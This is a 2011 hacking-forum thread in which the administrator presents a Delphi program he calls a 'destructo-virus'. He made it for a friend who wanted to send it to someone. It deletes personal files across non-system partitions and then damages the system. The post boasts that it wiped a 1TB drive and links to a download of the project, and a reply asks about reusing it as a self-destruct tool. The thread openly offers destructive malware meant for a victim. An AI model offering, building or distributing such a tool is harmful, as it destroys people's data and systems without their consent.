Author Topic: [Delphi] DeleteMyFiles  (Read 6378 times)

0 Members and 1 Guest are viewing this topic.

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
[Delphi] DeleteMyFiles
« on: July 29, 2011, 09:26:38 pm »
Ohai thar. Well my friend asked for a destructo-virus, one that would delete files when you run it, wants to send to some idiot that talks too much :P
So I did. This one attempts to grab a list of partitions and delete files on non system ones first, erasing their personal files like pictures, music and whatnot before b0rking the system up. Tested on WinXP SP3 on VM. Did not try on Win7, although it should work...
Yeah yeah... lame. But hell, I don't spread that shit, I just make them :P

EDIT: "Virus" succeeded deleting 1TB hdd on Win7 before b0rking the system up without a problem :D

Project: http://9v.lt/projects/delphi/DeleteMyFiles/DeleteMyFiles.zip
« Last Edit: June 17, 2014, 02:58:12 pm by Kulverstukas »

Offline Dropchop

  • Peasant
  • *
  • Posts: 74
  • Cookies: 3
    • View Profile
Re: [Delphi] DeleteMyFiles
« Reply #1 on: August 02, 2011, 12:39:54 am »
This got me thinking: Would it to be possible to use this a a sort of "Self destruct button" if you keep your OS on a separate partition?



 "I have lived on the lip of insanity, wanting to know reasons, knocking on a door. It opens. I've been knocking from the inside."
-- Rumi

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Delphi] DeleteMyFiles
« Reply #2 on: August 02, 2011, 01:43:57 pm »
This got me thinking: Would it to be possible to use this a a sort of "Self destruct button" if you keep your OS on a separate partition?

No, because this won't delete the whole system, it will just delete the files that are not currently used by the system.
If you want a complete destruction, boot up "Hiren's Boot and Nuke". That shit will wipe your HDD clean.